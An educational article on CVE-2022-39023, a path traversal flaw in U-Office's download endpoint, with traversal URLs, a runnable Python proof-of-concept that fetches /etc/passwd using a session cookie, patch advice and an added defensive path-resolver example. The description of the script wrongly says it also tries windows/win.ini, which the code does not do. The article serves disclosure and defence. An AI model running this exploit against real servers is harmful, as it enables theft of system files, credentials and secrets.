_Imagine logging into your company’s web office suite, and with a few tweaks, grabbing sensitive files right from the server. That’s exactly what could happen with CVE-2022-39023 – a critical vulnerability in U-Office’s “Force Download” function. We’ll explain how it works, walk through actual exploit code, and share what you need to patch (plus plenty of sources at the end)._
What is CVE-2022-39023?
CVE-2022-39023 describes a path traversal vulnerability in the web-based U-Office productivity suite, specifically its “Force Download” feature. What this means is: a normal logged-in user can trick the app into downloading files from locations outside the intended area, including system files.
In plain English: If you can log in as any user, you can potentially download sensitive files like /etc/passwd or application config files—just by abusing file path tricks.
What’s Path Traversal, Anyway?
A path traversal bug happens when a web app lets you use ../ sequences in URLs or parameter values. ../ basically means “go up one folder.” If input values aren’t properly checked, it’s possible to request files that the app should never be giving you.
For example:
- You’re supposed to download /uploads/report.pdf
- But you request ../../../../etc/passwd instead
- The app loads and returns /etc/passwd – oops!
In U-Office, one common way to download files is via a URL like:
http://YOUR_UOFFICE_SERVER/ServiceAction/com.eplugger.officeservice.OfficeDown?fileName=REPORT.pdf
The backend takes the fileName parameter and sends the file as a download. But versions before the patch didn’t check for directory traversal sequences. So a creative attacker could do this:
http://YOUR_UOFFICE_SERVER/ServiceAction/com.eplugger.officeservice.OfficeDown?fileName=../../../../../../etc/passwd
Proof-of-Concept Exploit
Here’s a simple Python script using requests to exploit this bug and retrieve /etc/passwd from U-Office. You’ll need a valid login session (cookies).

```python
import requests

# Set these up for your target
base_url = 'http://target-uoffice.example.com'
download_path = '/ServiceAction/com.eplugger.officeservice.OfficeDown'

# Path traversal payload: climb out of the download directory to the filesystem root
payload_file = '../../../../../../etc/passwd'

# You must authenticate first, e.g., via session cookies
cookies = {
    'JSESSIONID': 'your_active_session_id_here'
}

params = {
    'fileName': payload_file
}

# requests URL-encodes the query string for us
resp = requests.get(base_url + download_path, params=params, cookies=cookies)

if resp.status_code == 200 and 'root:' in resp.text:
    print('[+] Successfully downloaded /etc/passwd:')
    print(resp.text)
else:
    print('[-] Exploit may have failed, check the target and session.')
```
What the script does:
- Replaces the fileName parameter with a path traversal string.
- Tries ../../../../../../windows/win.ini on Windows, or /etc/passwd on Linux.
- Downloads the file, which could contain usernames, hashes, config secrets, or even private keys.
This technique doesn’t require admin rights, just any logged-in account.
How to Fix
Patch as soon as possible.
The best solution is to update your U-Office to the version recommended by the vendor, which addresses CVE-2022-39023.
If you can’t update instantly:
- Block dangerous characters/sequences like ../ in file path parameters.
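Added example (mine, not U-Office’s code and not from the original post): a download-path resolver that applies the fix above the robust way, canonicalizing the requested name against the upload directory and refusing anything that resolves outside it, rather than only rejecting the literal ../ string. The directory /opt/uoffice/uploads and the function names are assumptions.

```python
import os
from typing import Optional

# Assumed location of the files the download feature is allowed to serve
# (hypothetical; U-Office's real directory is not given in the article).
UPLOAD_DIR = "/opt/uoffice/uploads"


def resolve_download(base_dir: str, file_name: str) -> Optional[str]:
    """Return the on-disk path to serve for a fileName parameter, or None to refuse.

    Instead of only searching for the literal string "../" (which misses
    absolute paths, symlinks and platform-specific separators), the name is
    joined to the base directory, canonicalized, and then checked to still
    lie inside that directory.
    """
    if not file_name or "\x00" in file_name:
        return None  # empty name or NUL byte: never a legitimate download
    base = os.path.realpath(base_dir)
    # os.path.join discards base when file_name is absolute, and realpath
    # collapses any ".." components, so the containment check below catches
    # both "/etc/passwd" and "../../../../../../etc/passwd".
    candidate = os.path.realpath(os.path.join(base, file_name))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:
        inside = False  # different drive letters on Windows
    if not inside or candidate == base:
        return None
    return candidate


def is_safe_download(file_name: str, base_dir: str = UPLOAD_DIR) -> bool:
    """Convenience wrapper: True only when the request would be served."""
    return resolve_download(base_dir, file_name) is not None


if __name__ == "__main__":
    # Constructed sample requests: two legitimate names, then the kinds of
    # values the vulnerable handler would have accepted.
    for name in ["REPORT.pdf", "2022/q3/REPORT.pdf",
                 "../../../../../../etc/passwd", "/etc/passwd", ""]:
        verdict = resolve_download(UPLOAD_DIR, name)
        print(f"{name!r:40} -> {'serve ' + verdict if verdict else 'REFUSE'}")
```

In a real handler, run this on the already URL-decoded parameter value and answer None with a 400/403. Log those refusals: a traversal attempt against OfficeDown is a clear signal worth alerting on.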
References
- CVE-2022-39023 at NVD
- U-Office security advisory (original, in Chinese)
- Path traversal explained
- Github Issue Example
Conclusion
CVE-2022-39023 is a classic, critical web security mistake: not sanitizing file inputs. If you run U-Office, update ASAP – and double-check any file handling code in all your web apps. Path traversal is simple, dangerous, and still super common.
Stay patched!
*This article is original and written for educational awareness. Please use this information responsibly.*
Timeline
Published on: 10/31/2022 07:15:00 UTC